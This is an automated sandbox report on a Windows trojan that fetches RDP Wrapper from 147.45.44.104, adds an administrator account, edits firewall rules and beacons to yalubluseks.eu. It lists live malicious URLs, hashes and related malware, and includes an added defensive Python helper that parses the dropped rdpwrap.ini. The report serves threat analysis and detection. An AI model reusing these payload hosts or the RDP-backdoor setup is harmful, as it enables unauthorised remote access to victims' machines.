Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (11) | DLL Side-Loading (1) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (22) | Cached Domain Credentials | Security Software Discovery (121) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (41) | DCSync | Virtualization/Sandbox Evasion (41) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (11) | /etc/passwd and /etc/shadow | System Network Configuration Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph (ID: 1528587; Sample: SecuriteInfo.com.Win32.Malw...; Startdate: 08/10/2024; Architecture: WINDOWS; Score: 100)

Signatures on the sample: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures
Network contacts of the sample: 147.45.44.104, 49730, 80, FREE-NET-ASFREEnetEU, Russian Federation; api.ipify.org 104.26.12.205, 49732, 80, CLOUDFLARENETUS, United States; yalubluseks.eu 172.67.140.92, 443, 49733, CLOUDFLARENETUS, United States

Process tree:
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe (dropped C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32)
  cmd.exe -> RDPWInst.exe (dropped C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ and C:\Windows\System32\rfxvmt.dll, PE32+; signatures: Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, Uses netsh to modify the Windows network and firewall settings, 3 other signatures) -> netsh.exe; conhost.exe
  cmd.exe (signature: Adds a new user with administrator rights) -> net.exe -> net1.exe; conhost.exe
  cmd.exe -> net.exe -> net1.exe; conhost.exe
  2 other processes -> net.exe -> net1.exe; conhost.exe
Drivers started: rdpvideominiport.sys; rdpdr.sys; tsusbhub.sys

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | 45% | ReversingLabs | Win32.Trojan.Generic
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | 58% | Virustotal |
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 100% | Joe Sandbox ML |
C:\Program Files\RDP Wrapper\rdpwrap.dll | 54% | ReversingLabs | Win64.PUA.RDPWrapper
C:\Program Files\RDP Wrapper\rdpwrap.dll | 57% | Virustotal |
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 68% | ReversingLabs | Win32.PUA.RDPWrap
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 78% | Virustotal |
C:\Windows\System32\rfxvmt.dll | 0% | ReversingLabs |
C:\Windows\System32\rfxvmt.dll | 0% | Virustotal |
                        No Antivirus matches
Source | Detection | Scanner | Label
api.ipify.org | 0% | Virustotal |
yalubluseks.eu | 12% | Virustotal |
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | 23% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
http://stascorp.com/load/1-1-0-62 | 1% | Virustotal |
http://www.apache.org/licenses/ | 0% | Virustotal |
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU | 0% | Virustotal |
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | 2% | Virustotal |
https://yalubluseks.eu/get_rdp.php | 2% | Virustotal |
http://147.45.44.104 | 21% | Virustotal |
http://api.ipify.org | 0% | Virustotal |
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeP | 20% | Virustotal |
https://yalubluseks.eu | 3% | Virustotal |
http://api.ipify.org/ | 0% | Virustotal |
http://yalubluseks.eu | 12% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | unknown
yalubluseks.eu | 172.67.140.92 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | false | | unknown
http://api.ipify.org/ | false | | unknown
https://yalubluseks.eu/get_rdp.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://stascorp.com/load/1-1-0-62 | RDPWInst.exe, RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0 | RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr | false | | unknown
http://yalubluseks.eud | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://api.ipify.orgd | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://stascorp.comDVarFileInfo$ | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.3.dr | false | | unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU | RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr | false | | unknown
http://www.apache.org/licenses/ | RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr | false | | unknown
https://yalubluseks.eu/get_rdp.phpd | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | RDPWInst.exe | false | | unknown
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeP | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.27.dr | false | URL Reputation: safe | unknown
http://147.45.44.104 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://yalubluseks.eu | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://yalubluseks.eu | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://api.ipify.org | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | false | | unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
147.45.44.104 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
172.67.140.92 | yalubluseks.eu | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528587
Start date and time: 2024-10-08 03:30:02 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 29
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
Detection: MAL
Classification: mal100.spre.troj.evad.winEXE@29/11@2/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 77
• Number of non-executed functions: 45
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, PID 6468 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.12.205 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
104.26.12.205 | 2zYP8qOYmJ.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
147.45.44.104 | hloRQZmlfg.exe | malicious | RDPWrap Tool | 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
147.45.44.104 | T2bmenoX1o.exe | malicious | LummaC, Vidar | nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
147.45.44.104 | http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xin | malicious | PureLog Stealer, RedLine, zgRAT | hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe
147.45.44.104 | http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe | malicious | Unknown | hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe
147.45.44.104 | http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe | malicious | Unknown | hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe
147.45.44.104 | lihZ6gUU7V.exe | malicious | LummaC, Stealc, Vidar | nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
147.45.44.104 | Bn7LPdQA1s.exe | malicious | LummaC, Vidar | nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
147.45.44.104 | WiTqtf1aiE.exe | malicious | LummaC, Vidar | nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
147.45.44.104 | wULBz8VjH0.exe | malicious | Vidar | nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: api.ipify.org
  hloRQZmlfg.exe | malicious | RDPWrap Tool | 104.26.12.205
  Ref#0503711.exe | malicious | AgentTesla | 172.67.74.152
  8ID0109FLT24PO92CD-R.pdf | malicious | HTMLPhisher | 104.26.12.205
  shipping.exe | malicious | AgentTesla | 172.67.74.152
  QUOTATIONS#08673.exe | malicious | AgentTesla | 172.67.74.152
  MAVI VATAN - VSL's DETAILS.docx.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
  http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.html | malicious | Unknown | 172.67.74.152
  New order.exe | malicious | AgentTesla | 104.26.12.205
  http://netflix.dittmedlemskap.com/ | malicious | Unknown | 172.67.74.152
Match: yalubluseks.eu
  file.exe | malicious | Unknown | 104.21.54.163
  file.exe | malicious | Unknown | 104.21.54.163
  file.exe | malicious | Unknown | 172.67.140.92
  file.exe | malicious | Unknown | 104.21.54.163
  file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 172.67.140.92
  file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.21.54.163
  2zYP8qOYmJ.exe | malicious | Unknown | 172.67.140.92
  2zYP8qOYmJ.exe | malicious | Unknown | 172.67.140.92
  file.exe | malicious | Unknown | 172.67.140.92
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: CLOUDFLARENETUS
  hloRQZmlfg.exe | malicious | RDPWrap Tool | 188.114.96.3
  SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exe | malicious | LummaC | 172.67.206.204
  file.exe | malicious | LummaC | 172.67.206.204
  https://starylasfe.com.de/6SZZr/ | malicious | HTMLPhisher | 104.17.25.14
  2ngxhElaud.exe | malicious | Xmrig | 172.67.173.168
  copyright_infringement_evidence_1.exe | malicious | Unknown | 172.67.158.129
  file.exe | malicious | LummaC | 172.67.206.204
  Copyright_Infringement_Evidence.exe | malicious | Unknown | 172.67.158.129
  ArT23Ix6Ox.exe | malicious | Unknown | 172.67.159.186
Match: FREE-NET-ASFREEnetEU
  hloRQZmlfg.exe | malicious | RDPWrap Tool | 147.45.44.104
  T2bmenoX1o.exe | malicious | LummaC, Vidar | 147.45.44.104
  http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xin | malicious | PureLog Stealer, RedLine, zgRAT | 147.45.44.104
  http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe | malicious | Unknown | 147.45.44.104
  http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe | malicious | Unknown | 147.45.44.104
  T8TY28UxiT.dll | malicious | Unknown | 147.45.116.5
  T8TY28UxiT.dll | malicious | Unknown | 147.45.116.5
  Q0cWJo6Jvh.exe | malicious | Unknown | 147.45.116.5
  Q0cWJo6Jvh.exe | malicious | Unknown | 147.45.116.5
Match: CLOUDFLARENETUS (listed a second time in the report, with the same nine matches as the first CLOUDFLARENETUS entry above)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  hloRQZmlfg.exe | malicious | RDPWrap Tool | 172.67.140.92
  2ngxhElaud.exe | malicious | Xmrig | 172.67.140.92
  https://Vv.ndlevesio.com/vrbU/ | malicious | Unknown | 172.67.140.92
  x2Yi9Hr77a.exe | malicious | XWorm | 172.67.140.92
  file.exe | malicious | Xmrig | 172.67.140.92
  http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe | malicious | Unknown | 172.67.140.92
  STlUEqhwpx.exe | malicious | Quasar | 172.67.140.92
  EUYIlr7uUX.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.140.92
  file.exe | malicious | Credential Flusher | 172.67.140.92
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Program Files\RDP Wrapper\rdpwrap.dll
  hloRQZmlfg.exe | malicious | RDPWrap Tool
  file.exe | malicious | RDPWrap Tool
  file.exe | malicious | RDPWrap Tool
  file.exe | malicious | RDPWrap Tool
  file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
  file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
  file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
  file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
  file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
                                                  Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):116736
                                                  Entropy (8bit):5.884975745255681
                                                  Encrypted:false
                                                  SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                  MD5:461ADE40B800AE80A40985594E1AC236
                                                  SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                  SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                  SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                  Malicious:true
Antivirus:
  • ReversingLabs: 54%
  • Virustotal: 57%
Joe Sandbox View:
  • hloRQZmlfg.exe: malicious
  • file.exe: malicious (eight earlier analyses with this file name, each listed separately in the report)
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  File Type:Generic INItialization configuration [SLPolicy]
                                                  Category:dropped
                                                  Size (bytes):443552
                                                  Entropy (8bit):5.4496544667416975
                                                  Encrypted:false
                                                  SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                  MD5:92BC5FEDB559357AA69D516A628F45DC
                                                  SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                  SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                  SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                  Malicious:false
Preview (rdpwrap.ini with its CRLF line breaks restored; the report's preview is cut off after the Licenses-TS key):
  ; RDP Wrapper Library configuration
  ; Do not modify without special knowledge
  ; Edited by sebaxakerhtc

  [Main]
  Updated=2024-09-25
  LogFile=\rdpwrap.txt
  SLPolicyHookNT60=1
  SLPolicyHookNT61=1

  [SLPolicy]
  TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1
  TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1
  TerminalServices-RemoteConnectionManager-AllowAppServerMode=1
  TerminalServices-RemoteConnectionManager-AllowMultimon=1
  TerminalServices-RemoteConnectionManager-MaxUserSessions=0
  TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0
  TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2
  TerminalServices-RDP-7-Advanced-Compression-Allowed=1
  TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0
  TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000
  TerminalServices-DeviceRedirection-Licenses-TS
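The [SLPolicy] section above is what does the damage: rdpwrap.dll feeds these values back to termsrv in place of the real client-SKU licensing policy, so a Windows 10 Pro workstation answers "multiple sessions allowed, no per-user cap" and becomes a multi-user RDP host for the attacker-created administrator account. The following triage helper is an added example, not code from the report or from the RDP Wrapper project: it parses an rdpwrap.ini and returns the policy overrides that loosen RDP together with the [Main] values worth hunting for on a host. The embedded INI text is constructed from the truncated preview above, and the set of keys treated as "loosening" is my own heuristic, not anything the report or the tool defines.

```python
"""Added triage helper (not part of the Joe Sandbox report): parse an
rdpwrap.ini dropped by RDP Wrapper and flag the [SLPolicy] keys that turn a
Windows client SKU into a multi-session RDP host."""
import configparser
from typing import Dict, List, Tuple

# Constructed from the preview of the dropped rdpwrap.ini in the report; the
# preview is cut off after the Licenses-TS key, so only the keys visible there
# are reproduced here.
RDPWRAP_INI = r"""
; RDP Wrapper Library configuration
; Do not modify without special knowledge
; Edited by sebaxakerhtc

[Main]
Updated=2024-09-25
LogFile=\rdpwrap.txt
SLPolicyHookNT60=1
SLPolicyHookNT61=1

[SLPolicy]
TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1
TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1
TerminalServices-RemoteConnectionManager-AllowAppServerMode=1
TerminalServices-RemoteConnectionManager-AllowMultimon=1
TerminalServices-RemoteConnectionManager-MaxUserSessions=0
TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2
TerminalServices-RDP-7-Advanced-Compression-Allowed=1
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0
TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000
"""


def parse_rdpwrap_ini(text: str) -> configparser.ConfigParser:
    """Parse rdpwrap.ini, keeping key case (the GUIDs inside key names matter)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # default lower-cases keys; keep them verbatim
    cp.read_string(text)
    return cp


def _leaf(key: str) -> str:
    """Last dash-separated component, e.g. '...-AllowMultipleSessions' -> 'AllowMultipleSessions'."""
    return key.rsplit("-", 1)[-1]


def policy_findings(cp: configparser.ConfigParser) -> List[Tuple[str, str, str]]:
    """Return (key, value, why it matters) for every [SLPolicy] override that
    loosens the client-SKU RDP restrictions. The rule set is a heuristic
    chosen for this example, not an official list."""
    findings: List[Tuple[str, str, str]] = []
    if not cp.has_section("SLPolicy"):
        return findings
    for key, value in cp.items("SLPolicy"):
        leaf = _leaf(key)
        if leaf == "AllowMultipleSessions" and value == "1":
            findings.append((key, value, "concurrent interactive sessions allowed"))
        elif leaf == "AllowAppServerMode" and value == "1":
            findings.append((key, value, "application-server (multi-user) mode forced on"))
        elif leaf == "MaxUserSessions" and value == "0":
            findings.append((key, value, "no cap on sessions per user"))
        elif leaf == "MaxSessions" and value.isdigit() and int(value) != 1:
            findings.append((key, value, "session cap lifted (0 = unlimited)"))
        elif leaf == "LocalOnly" and value == "0":
            findings.append((key, value, "policy no longer restricted to console sessions"))
    return findings


def is_multi_session_config(cp: configparser.ConfigParser) -> bool:
    """True when the config both allows multiple sessions and lifts the per-user cap."""
    items = cp.items("SLPolicy") if cp.has_section("SLPolicy") else []
    leafs = {_leaf(k): v for k, v in items}
    return leafs.get("AllowMultipleSessions") == "1" and leafs.get("MaxUserSessions") == "0"


def host_artefacts(cp: configparser.ConfigParser) -> Dict[str, str]:
    """[Main] values worth hunting for on the host: RDP Wrapper's own log file
    (LogFile, here \rdpwrap.txt) and the config build date as a version fingerprint."""
    main = cp["Main"] if cp.has_section("Main") else {}
    return {
        "log_file": main.get("LogFile", ""),
        "updated": main.get("Updated", ""),
        "sl_hook_nt60": main.get("SLPolicyHookNT60", "0"),
        "sl_hook_nt61": main.get("SLPolicyHookNT61", "0"),
    }


if __name__ == "__main__":
    cfg = parse_rdpwrap_ini(RDPWRAP_INI)
    for key, val, why in policy_findings(cfg):
        print(f"{key}={val}    # {why}")
    print("multi-session host config:", is_multi_session_config(cfg))
    print("hunt on host:", host_artefacts(cfg))
```

On the config from this sample the helper reports seven loosening overrides and classifies it as a multi-session host configuration; pointing it at a benign rdpwrap.ini (or one with AllowMultipleSessions=0 and MaxUserSessions=1) yields no findings. Pair the output with the other artefacts in this report when hunting: rdpwrap.dll under C:\Program Files\RDP Wrapper, RDPWInst.exe in the user's Temp directory, and the netsh invocation that adjusted the firewall.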
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):1.2018820499323044
                                                  Encrypted:false
                                                  SSDEEP:192:l+fXFiSRFf0BU/qaWc+LyVkzuiFhZ24IO87:wYSIBU/qafcukzuiFhY4IO87
                                                  MD5:32991B0496678D5AF9FD65F67AAC020B
                                                  SHA1:264E9A8153468A5B414FB6D72953AB4180B7BA06
                                                  SHA-256:FCFF70DCF81770B1CCE1B6249F1FADB2CFE385F29430A93E3B63E726EFC46C1E
                                                  SHA-512:09689FDE0FD7E3369E35AB7B6E9F209606E4CC42F08EB09BB08B4A8C6DD649E7F0406A5C180163283EE1957380710969695A73884065D313EF0D9D1B174F6DFD
                                                  Malicious:false
Preview (UTF-16 WER report decoded, one key per line; cut off in the report after TargetAppId):
  Version=1
  EventType=CLR20r3
  EventTime=133728246604986085
  ReportType=2
  Consent=1
  UploadTime=133728246610298524
  ReportStatus=524384
  ReportIdentifier=04e90f10-59e5-485a-8fbc-2e65a023bd0f
  IntegratorReportIdentifier=2992d649-32c6-4b2d-9f59-c29f5767ea46
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
  OriginalFilename=RDPCreator.exe
  AppSessionGuid=00001944-0001-0014-d7b9-83b62119db01
  TargetAppId=W:0006b6feacd6b160004d50bc15468b1bc3de00000000!0
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 8 01:31:00 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):380341
                                                  Entropy (8bit):3.2563959260196413
                                                  Encrypted:false
                                                  SSDEEP:3072:mN+SLROjZ2Lc4uEqSyZp4LTgyeF0kbZhC1F:mNrNOjILc43yZ0TgPF0k4
                                                  MD5:61C9F6C98C2386EA58783A51469BB2A0
                                                  SHA1:6032B12BFDBFEA9A7D2C1EC3C7E1CDBB8C8D7408
                                                  SHA-256:99FEAA69630EC2BF3DF79F507AD324DCD4669E6A51737EA56FA33CA2885958B7
                                                  SHA-512:1F86051E4EA1E1E7C4D08D7DFC9BC36F99335121534F502D7028B4C85A60816585F28D3026611126816C7C374EF8807F4E423412C6D0B96AEEFF4B753DF30653
                                                  Malicious:false
                                                  Preview:MDMP..a..... .......T..g....................................<....).......*..D...........`.......8...........T............a...l..........,*...........,..............................................................................eJ.......,......GenuineIntel............T.......D...L..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8502
                                                  Entropy (8bit):3.7023559555371683
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJ47686Y9USUl1gmfZOwzpr3q89bcgsfRfl0m:R6lXJ0686YOSUl1gmfldczfN
                                                  MD5:A41CF9F85FED935F9A356FF2EE1343AC
                                                  SHA1:44C522267B96F9A4CB0396738923BB65828EADB3
                                                  SHA-256:326AED5BDF7A7242AAB5E050F366937AA4CBB94F465FFDE805DAE284B9F3A990
